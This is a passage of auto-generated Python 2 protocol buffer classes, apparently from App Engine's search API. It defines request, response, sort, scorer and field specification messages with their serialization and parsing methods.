if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
3: "app_id",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ListIndexesRequest'
class ListIndexesResponse(ProtocolBuffer.ProtocolMessage):
has_status_ = 0
def __init__(self, contents=None):
self.status_ = RequestStatus()
self.index_metadata_ = []
if contents is not None: self.MergeFromString(contents)
def status(self): return self.status_
def mutable_status(self): self.has_status_ = 1; return self.status_
def clear_status(self):self.has_status_ = 0; self.status_.Clear()
def has_status(self): return self.has_status_
def index_metadata_size(self): return len(self.index_metadata_)
def index_metadata_list(self): return self.index_metadata_
def index_metadata(self, i):
return self.index_metadata_[i]
def mutable_index_metadata(self, i):
return self.index_metadata_[i]
def add_index_metadata(self):
x = IndexMetadata()
self.index_metadata_.append(x)
return x
def clear_index_metadata(self):
self.index_metadata_ = []
def MergeFrom(self, x):
assert x is not self
if (x.has_status()): self.mutable_status().MergeFrom(x.status())
for i in xrange(x.index_metadata_size()): self.add_index_metadata().CopyFrom(x.index_metadata(i))
def Equals(self, x):
if x is self: return 1
if self.has_status_ != x.has_status_: return 0
if self.has_status_ and self.status_ != x.status_: return 0
if len(self.index_metadata_) != len(x.index_metadata_): return 0
for e1, e2 in zip(self.index_metadata_, x.index_metadata_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_status_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: status not set.')
elif not self.status_.IsInitialized(debug_strs): initialized = 0
for p in self.index_metadata_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.status_.ByteSize())
n += 1 * len(self.index_metadata_)
for i in xrange(len(self.index_metadata_)): n += self.lengthString(self.index_metadata_[i].ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_status_):
n += 1
n += self.lengthString(self.status_.ByteSizePartial())
n += 1 * len(self.index_metadata_)
for i in xrange(len(self.index_metadata_)): n += self.lengthString(self.index_metadata_[i].ByteSizePartial())
return n
def Clear(self):
self.clear_status()
self.clear_index_metadata()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSize())
self.status_.OutputUnchecked(out)
for i in xrange(len(self.index_metadata_)):
out.putVarInt32(18)
out.putVarInt32(self.index_metadata_[i].ByteSize())
self.index_metadata_[i].OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_status_):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSizePartial())
self.status_.OutputPartial(out)
for i in xrange(len(self.index_metadata_)):
out.putVarInt32(18)
out.putVarInt32(self.index_metadata_[i].ByteSizePartial())
self.index_metadata_[i].OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_status().TryMerge(tmp)
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_index_metadata().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_status_:
res+=prefix+"status <\n"
res+=self.status_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt=0
for e in self.index_metadata_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("index_metadata%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
kindex_metadata = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
2: "index_metadata",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ListIndexesResponse'
class DeleteSchemaParams(ProtocolBuffer.ProtocolMessage):
has_source_ = 0
source_ = 0
def __init__(self, contents=None):
self.index_spec_ = []
if contents is not None: self.MergeFromString(contents)
def source(self): return self.source_
def set_source(self, x):
self.has_source_ = 1
self.source_ = x
def clear_source(self):
if self.has_source_:
self.has_source_ = 0
self.source_ = 0
def has_source(self): return self.has_source_
def index_spec_size(self): return len(self.index_spec_)
def index_spec_list(self): return self.index_spec_
def index_spec(self, i):
return self.index_spec_[i]
def mutable_index_spec(self, i):
return self.index_spec_[i]
def add_index_spec(self):
x = IndexSpec()
self.index_spec_.append(x)
return x
def clear_index_spec(self):
self.index_spec_ = []
def MergeFrom(self, x):
assert x is not self
if (x.has_source()): self.set_source(x.source())
for i in xrange(x.index_spec_size()): self.add_index_spec().CopyFrom(x.index_spec(i))
def Equals(self, x):
if x is self: return 1
if self.has_source_ != x.has_source_: return 0
if self.has_source_ and self.source_ != x.source_: return 0
if len(self.index_spec_) != len(x.index_spec_): return 0
for e1, e2 in zip(self.index_spec_, x.index_spec_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.index_spec_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
if (self.has_source_): n += 1 + self.lengthVarInt64(self.source_)
n += 1 * len(self.index_spec_)
for i in xrange(len(self.index_spec_)): n += self.lengthString(self.index_spec_[i].ByteSize())
return n
def ByteSizePartial(self):
n = 0
if (self.has_source_): n += 1 + self.lengthVarInt64(self.source_)
n += 1 * len(self.index_spec_)
for i in xrange(len(self.index_spec_)): n += self.lengthString(self.index_spec_[i].ByteSizePartial())
return n
def Clear(self):
self.clear_source()
self.clear_index_spec()
def OutputUnchecked(self, out):
if (self.has_source_):
out.putVarInt32(8)
out.putVarInt32(self.source_)
for i in xrange(len(self.index_spec_)):
out.putVarInt32(18)
out.putVarInt32(self.index_spec_[i].ByteSize())
self.index_spec_[i].OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_source_):
out.putVarInt32(8)
out.putVarInt32(self.source_)
for i in xrange(len(self.index_spec_)):
out.putVarInt32(18)
out.putVarInt32(self.index_spec_[i].ByteSizePartial())
self.index_spec_[i].OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_source(d.getVarInt32())
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_index_spec().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_source_: res+=prefix+("source: %s\n" % self.DebugFormatInt32(self.source_))
cnt=0
for e in self.index_spec_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("index_spec%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
ksource = 1
kindex_spec = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "source",
2: "index_spec",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteSchemaParams'
class DeleteSchemaRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = DeleteSchemaParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 26:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
3: "app_id",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteSchemaRequest'
class DeleteSchemaResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
self.status_ = []
if contents is not None: self.MergeFromString(contents)
def status_size(self): return len(self.status_)
def status_list(self): return self.status_
def status(self, i):
return self.status_[i]
def mutable_status(self, i):
return self.status_[i]
def add_status(self):
x = RequestStatus()
self.status_.append(x)
return x
def clear_status(self):
self.status_ = []
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.status_size()): self.add_status().CopyFrom(x.status(i))
def Equals(self, x):
if x is self: return 1
if len(self.status_) != len(x.status_): return 0
for e1, e2 in zip(self.status_, x.status_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.status_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.status_)
for i in xrange(len(self.status_)): n += self.lengthString(self.status_[i].ByteSize())
return n
def ByteSizePartial(self):
n = 0
n += 1 * len(self.status_)
for i in xrange(len(self.status_)): n += self.lengthString(self.status_[i].ByteSizePartial())
return n
def Clear(self):
self.clear_status()
def OutputUnchecked(self, out):
for i in xrange(len(self.status_)):
out.putVarInt32(10)
out.putVarInt32(self.status_[i].ByteSize())
self.status_[i].OutputUnchecked(out)
def OutputPartial(self, out):
for i in xrange(len(self.status_)):
out.putVarInt32(10)
out.putVarInt32(self.status_[i].ByteSizePartial())
self.status_[i].OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_status().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.status_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("status%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteSchemaResponse'
class SortSpec(ProtocolBuffer.ProtocolMessage):
has_sort_expression_ = 0
sort_expression_ = ""
has_sort_descending_ = 0
sort_descending_ = 1
has_default_value_text_ = 0
default_value_text_ = ""
has_default_value_numeric_ = 0
default_value_numeric_ = 0.0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def sort_expression(self): return self.sort_expression_
def set_sort_expression(self, x):
self.has_sort_expression_ = 1
self.sort_expression_ = x
def clear_sort_expression(self):
if self.has_sort_expression_:
self.has_sort_expression_ = 0
self.sort_expression_ = ""
def has_sort_expression(self): return self.has_sort_expression_
def sort_descending(self): return self.sort_descending_
def set_sort_descending(self, x):
self.has_sort_descending_ = 1
self.sort_descending_ = x
def clear_sort_descending(self):
if self.has_sort_descending_:
self.has_sort_descending_ = 0
self.sort_descending_ = 1
def has_sort_descending(self): return self.has_sort_descending_
def default_value_text(self): return self.default_value_text_
def set_default_value_text(self, x):
self.has_default_value_text_ = 1
self.default_value_text_ = x
def clear_default_value_text(self):
if self.has_default_value_text_:
self.has_default_value_text_ = 0
self.default_value_text_ = ""
def has_default_value_text(self): return self.has_default_value_text_
def default_value_numeric(self): return self.default_value_numeric_
def set_default_value_numeric(self, x):
self.has_default_value_numeric_ = 1
self.default_value_numeric_ = x
def clear_default_value_numeric(self):
if self.has_default_value_numeric_:
self.has_default_value_numeric_ = 0
self.default_value_numeric_ = 0.0
def has_default_value_numeric(self): return self.has_default_value_numeric_
def MergeFrom(self, x):
assert x is not self
if (x.has_sort_expression()): self.set_sort_expression(x.sort_expression())
if (x.has_sort_descending()): self.set_sort_descending(x.sort_descending())
if (x.has_default_value_text()): self.set_default_value_text(x.default_value_text())
if (x.has_default_value_numeric()): self.set_default_value_numeric(x.default_value_numeric())
def Equals(self, x):
if x is self: return 1
if self.has_sort_expression_ != x.has_sort_expression_: return 0
if self.has_sort_expression_ and self.sort_expression_ != x.sort_expression_: return 0
if self.has_sort_descending_ != x.has_sort_descending_: return 0
if self.has_sort_descending_ and self.sort_descending_ != x.sort_descending_: return 0
if self.has_default_value_text_ != x.has_default_value_text_: return 0
if self.has_default_value_text_ and self.default_value_text_ != x.default_value_text_: return 0
if self.has_default_value_numeric_ != x.has_default_value_numeric_: return 0
if self.has_default_value_numeric_ and self.default_value_numeric_ != x.default_value_numeric_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_sort_expression_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: sort_expression not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.sort_expression_))
if (self.has_sort_descending_): n += 2
if (self.has_default_value_text_): n += 1 + self.lengthString(len(self.default_value_text_))
if (self.has_default_value_numeric_): n += 9
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_sort_expression_):
n += 1
n += self.lengthString(len(self.sort_expression_))
if (self.has_sort_descending_): n += 2
if (self.has_default_value_text_): n += 1 + self.lengthString(len(self.default_value_text_))
if (self.has_default_value_numeric_): n += 9
return n
def Clear(self):
self.clear_sort_expression()
self.clear_sort_descending()
self.clear_default_value_text()
self.clear_default_value_numeric()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.sort_expression_)
if (self.has_sort_descending_):
out.putVarInt32(16)
out.putBoolean(self.sort_descending_)
if (self.has_default_value_text_):
out.putVarInt32(34)
out.putPrefixedString(self.default_value_text_)
if (self.has_default_value_numeric_):
out.putVarInt32(41)
out.putDouble(self.default_value_numeric_)
def OutputPartial(self, out):
if (self.has_sort_expression_):
out.putVarInt32(10)
out.putPrefixedString(self.sort_expression_)
if (self.has_sort_descending_):
out.putVarInt32(16)
out.putBoolean(self.sort_descending_)
if (self.has_default_value_text_):
out.putVarInt32(34)
out.putPrefixedString(self.default_value_text_)
if (self.has_default_value_numeric_):
out.putVarInt32(41)
out.putDouble(self.default_value_numeric_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_sort_expression(d.getPrefixedString())
continue
if tt == 16:
self.set_sort_descending(d.getBoolean())
continue
if tt == 34:
self.set_default_value_text(d.getPrefixedString())
continue
if tt == 41:
self.set_default_value_numeric(d.getDouble())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_sort_expression_: res+=prefix+("sort_expression: %s\n" % self.DebugFormatString(self.sort_expression_))
if self.has_sort_descending_: res+=prefix+("sort_descending: %s\n" % self.DebugFormatBool(self.sort_descending_))
if self.has_default_value_text_: res+=prefix+("default_value_text: %s\n" % self.DebugFormatString(self.default_value_text_))
if self.has_default_value_numeric_: res+=prefix+("default_value_numeric: %s\n" % self.DebugFormat(self.default_value_numeric_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
ksort_expression = 1
ksort_descending = 2
kdefault_value_text = 4
kdefault_value_numeric = 5
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "sort_expression",
2: "sort_descending",
4: "default_value_text",
5: "default_value_numeric",
}, 5)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
4: ProtocolBuffer.Encoder.STRING,
5: ProtocolBuffer.Encoder.DOUBLE,
}, 5, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.SortSpec'
class ScorerSpec(ProtocolBuffer.ProtocolMessage):
RESCORING_MATCH_SCORER = 0
MATCH_SCORER = 2
_Scorer_NAMES = {
0: "RESCORING_MATCH_SCORER",
2: "MATCH_SCORER",
}
def Scorer_Name(cls, x): return cls._Scorer_NAMES.get(x, "")
Scorer_Name = classmethod(Scorer_Name)
has_scorer_ = 0
scorer_ = 2
has_limit_ = 0
limit_ = 1000
has_match_scorer_parameters_ = 0
match_scorer_parameters_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def scorer(self): return self.scorer_
def set_scorer(self, x):
self.has_scorer_ = 1
self.scorer_ = x
def clear_scorer(self):
if self.has_scorer_:
self.has_scorer_ = 0
self.scorer_ = 2
def has_scorer(self): return self.has_scorer_
def limit(self): return self.limit_
def set_limit(self, x):
self.has_limit_ = 1
self.limit_ = x
def clear_limit(self):
if self.has_limit_:
self.has_limit_ = 0
self.limit_ = 1000
def has_limit(self): return self.has_limit_
def match_scorer_parameters(self): return self.match_scorer_parameters_
def set_match_scorer_parameters(self, x):
self.has_match_scorer_parameters_ = 1
self.match_scorer_parameters_ = x
def clear_match_scorer_parameters(self):
if self.has_match_scorer_parameters_:
self.has_match_scorer_parameters_ = 0
self.match_scorer_parameters_ = ""
def has_match_scorer_parameters(self): return self.has_match_scorer_parameters_
def MergeFrom(self, x):
assert x is not self
if (x.has_scorer()): self.set_scorer(x.scorer())
if (x.has_limit()): self.set_limit(x.limit())
if (x.has_match_scorer_parameters()): self.set_match_scorer_parameters(x.match_scorer_parameters())
def Equals(self, x):
if x is self: return 1
if self.has_scorer_ != x.has_scorer_: return 0
if self.has_scorer_ and self.scorer_ != x.scorer_: return 0
if self.has_limit_ != x.has_limit_: return 0
if self.has_limit_ and self.limit_ != x.limit_: return 0
if self.has_match_scorer_parameters_ != x.has_match_scorer_parameters_: return 0
if self.has_match_scorer_parameters_ and self.match_scorer_parameters_ != x.match_scorer_parameters_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_scorer_): n += 1 + self.lengthVarInt64(self.scorer_)
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_match_scorer_parameters_): n += 1 + self.lengthString(len(self.match_scorer_parameters_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_scorer_): n += 1 + self.lengthVarInt64(self.scorer_)
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_match_scorer_parameters_): n += 1 + self.lengthString(len(self.match_scorer_parameters_))
return n
def Clear(self):
self.clear_scorer()
self.clear_limit()
self.clear_match_scorer_parameters()
def OutputUnchecked(self, out):
if (self.has_scorer_):
out.putVarInt32(8)
out.putVarInt32(self.scorer_)
if (self.has_limit_):
out.putVarInt32(16)
out.putVarInt32(self.limit_)
if (self.has_match_scorer_parameters_):
out.putVarInt32(74)
out.putPrefixedString(self.match_scorer_parameters_)
def OutputPartial(self, out):
if (self.has_scorer_):
out.putVarInt32(8)
out.putVarInt32(self.scorer_)
if (self.has_limit_):
out.putVarInt32(16)
out.putVarInt32(self.limit_)
if (self.has_match_scorer_parameters_):
out.putVarInt32(74)
out.putPrefixedString(self.match_scorer_parameters_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_scorer(d.getVarInt32())
continue
if tt == 16:
self.set_limit(d.getVarInt32())
continue
if tt == 74:
self.set_match_scorer_parameters(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_scorer_: res+=prefix+("scorer: %s\n" % self.DebugFormatInt32(self.scorer_))
if self.has_limit_: res+=prefix+("limit: %s\n" % self.DebugFormatInt32(self.limit_))
if self.has_match_scorer_parameters_: res+=prefix+("match_scorer_parameters: %s\n" % self.DebugFormatString(self.match_scorer_parameters_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kscorer = 1
klimit = 2
kmatch_scorer_parameters = 9
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "scorer",
2: "limit",
9: "match_scorer_parameters",
}, 9)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.NUMERIC,
9: ProtocolBuffer.Encoder.STRING,
}, 9, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ScorerSpec'
class FieldSpec_Expression(ProtocolBuffer.ProtocolMessage):
has_name_ = 0
name_ = ""
has_expression_ = 0
expression_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def expression(self): return self.expression_
def set_expression(self, x):
self.has_expression_ = 1
self.expression_ = x
def clear_expression(self):
if self.has_expression_:
self.has_expression_ = 0
self.expression_ = ""
def has_expression(self): return self.has_expression_
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
if (x.has_expression()): self.set_expression(x.expression())
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if self.has_expression_ != x.has_expression_: return 0
if self.has_expression_ and self.expression_ != x.expression_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: name not set.')
if (not self.has_expression_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: expression not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.name_))
n += self.lengthString(len(self.expression_))
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_name_):
n += 1
n += self.lengthString(len(self.name_))
if (self.has_expression_):
n += 1
n += self.lengthString(len(self.expression_))
return n
def Clear(self):
self.clear_name()
self.clear_expression()
def OutputUnchecked(self, out):
out.putVarInt32(26)
out.putPrefixedString(self.name_)
out.putVarInt32(34)
out.putPrefixedString(self.expression_)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(26)
out.putPrefixedString(self.name_)
if (self.has_expression_):
out.putVarInt32(34)
out.putPrefixedString(self.expression_)
def TryMerge(self, d):
while 1:
tt = d.getVarInt32()
if tt == 20: break
if tt == 26:
self.set_name(d.getPrefixedString())
continue
if tt == 34:
self.set_expression(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
if self.has_expression_: res+=prefix+("expression: %s\n" % self.DebugFormatString(self.expression_))
return res
class FieldSpec(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
self.name_ = []
self.expression_ = []
if contents is not None: self.MergeFromString(contents)
def name_size(self): return len(self.name_)
def name_list(self): return self.name_
def name(self, i):
return self.name_[i]
def set_name(self, i, x):
self.name_[i] = x
def add_name(self, x):
self.name_.append(x)
def clear_name(self):
self.name_ = []
def expression_size(self): return len(self.expression_)
def expression_list(self): return self.expression_
def expression(self, i):
return self.expression_[i]
def mutable_expression(self, i):
return self.expression_[i]
def add_expression(self):
x = FieldSpec_Expression()
self.expression_.append(x)
return x
def clear_expression(self):
self.expression_ = []
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.name_size()): self.add_name(x.name(i))
for i in xrange(x.expression_size()): self.add_expression().CopyFrom(x.expression(i))
def Equals(self, x):
if x is self: return 1
if len(self.name_) != len(x.name_): return 0
for e1, e2 in zip(self.name_, x.name_):
if e1 != e2: return 0
if len(self.expression_) != len(x.expression_): return 0
for e1, e2 in zip(self.expression_, x.expression_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.expression_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.name_)
for i in xrange(len(self.name_)): n += self.lengthString(len(self.name_[i]))
n += 2 * len(self.expression_)
for i in xrange(len(self.expression_)): n += self.expression_[i].ByteSize()
return n
def ByteSizePartial(self):
n = 0
n += 1 * len(self.name_)
for i in xrange(len(self.name_)): n += self.lengthString(len(self.name_[i]))
n += 2 * len(self.expression_)
for i in xrange(len(self.expression_)): n += self.expression_[i].ByteSizePartial()
return n
def Clear(self):
self.clear_name()
self.clear_expression()
def OutputUnchecked(self, out):
for i in xrange(len(self.name_)):
out.putVarInt32(10)
out.putPrefixedString(self.name_[i])
for i in xrange(len(self.expression_)):
out.putVarInt32(19)
self.expression_[i].OutputUnchecked(out)
out.putVarInt32(20)
def OutputPartial(self, out):
for i in xrange(len(self.name_)):
out.putVarInt32(10)
out.putPrefixedString(self.name_[i])
for i in xrange(len(self.expression_)):
out.putVarInt32(19)
self.expression_[i].OutputPartial(out)
out.putVarInt32(20)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.add_name(d.getPrefixedString())
continue
if tt == 19:
self.add_expression().TryMerge(d)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.name_:
elm=""
if printElemNumber: elm="(%d)" % cnt
